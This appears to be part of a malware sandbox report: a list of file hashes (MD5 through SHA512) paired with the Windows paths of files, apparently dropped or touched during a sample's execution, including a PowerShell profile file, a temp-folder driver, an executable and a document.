| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b42c70c1dbf0d1d477ec86902db9e986 |
| SHA1 | 1d1c0a670748b3d10bee8272e5d67a4fabefd31f |
| SHA256 | 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a |
| SHA512 | 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6dda114e7f90a57183feef155472e5f3 |
| SHA1 | 9474d1f00ed252c87566e72c4574295002dd22cd |
| SHA256 | 3828ef562c37cf33396518db08f520d4c7f365a6c9a4d6b2f51c39b8cc30f78f |
| SHA512 | 521bd5bab941f395d59e2f58bd804ed64a3ca998580ffa4b16803242eba90ae4a01106e234679b174001b3315c0c483d78a62f78c74874e84438b5d6f5f73716 |
C:\Windows\TEMP\icjtmxggdkbj.sys
| MD5 | 0c0195c48b6b8582fa6f6373032118da |
| SHA1 | d25340ae8e92a6d29f599fef426a2bc1b5217299 |
| SHA256 | 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 |
| SHA512 | ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c3adfd049611b786a8f29d9655ef372a |
| SHA1 | f2c472958646fd76e669e4016092fb229dc4eb79 |
| SHA256 | 698a66694d9a1adc77f59df79d91add31ea6385d2fcace1908706120f26d07b4 |
| SHA512 | 5f2648c2c8e373bd8f047f956fccc18e6ba18557a0a9d057f04d35473ccf2603bd743bd01cbd6942eb9e283bf7693d5ac99d3947694783a40217b123ba092e7d |
C:\Users\Admin\AppData\Local\Temp\D1D3.exe
| MD5 | b5012ad3f7b79ece2bf795a53b69fd9e |
| SHA1 | 40cffd108e02bc172f9c632e6da0d6abe468846f |
| SHA256 | 1e85da371e7d28623567725f04af71d792c7e3323f42fddd53500e691249002a |
| SHA512 | b7bfe32b5dae377b773d67e9cb7fde7e4052514cfd928252963babafa0234429a5a2c28dfd7ff38c3fcb9a728e742506f7b3c095a04cd950f1296a0e664878b5 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1d2e41dbc5dbe2e25a60be7377543f1e |
| SHA1 | 815f349a2bcab2bdbfe614984e779d4ff631b3de |
| SHA256 | c18055c5764adc2c708e04720e7c86b100aae4a487555d8b0c224f1bd5675803 |
| SHA512 | 87f2e425a95179633a85420078c3e2c42bd5e64cd041ff68347474351b1332bcb082d3b8bd7027ec18aa59c1a926424b6733bd5008bee7a6e098c45f6c554c87 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f3a232383bbde278077b9467fabfa053 |
| SHA1 | 727b8375245ddf9e4bf28205f7575d04c3aca48b |
| SHA256 | db0fc157acf4cf3a13fe509ef29b72ff8d1e1d95e58a6278e89009f9624b5811 |
| SHA512 | 5d2265fb35e64ee79f60d61fba9b8e417b6966ca04290119294a9d32d224aa15404e6b7ed49edfb570b562a044ec38087cd8a6a255fa4728538bf624f87814e5 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8778b6e0b46e6887da6ffbc4f2cb2f50 |
| SHA1 | 31d21e18ac644426c1aadd3df5dbaa8021773624 |
| SHA256 | 70210c5a353af4b4e6b12b648a69a692066ab048985adda82a2bfbf1e214f766 |
| SHA512 | 2b09f008b107994692c4428b1b1b8f92d6f53e517a3df5fb3810a403b6e73776c6d618085b71d566989cba42bbf81c1df1ff411babba5c997104f723ba4da6c0 |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |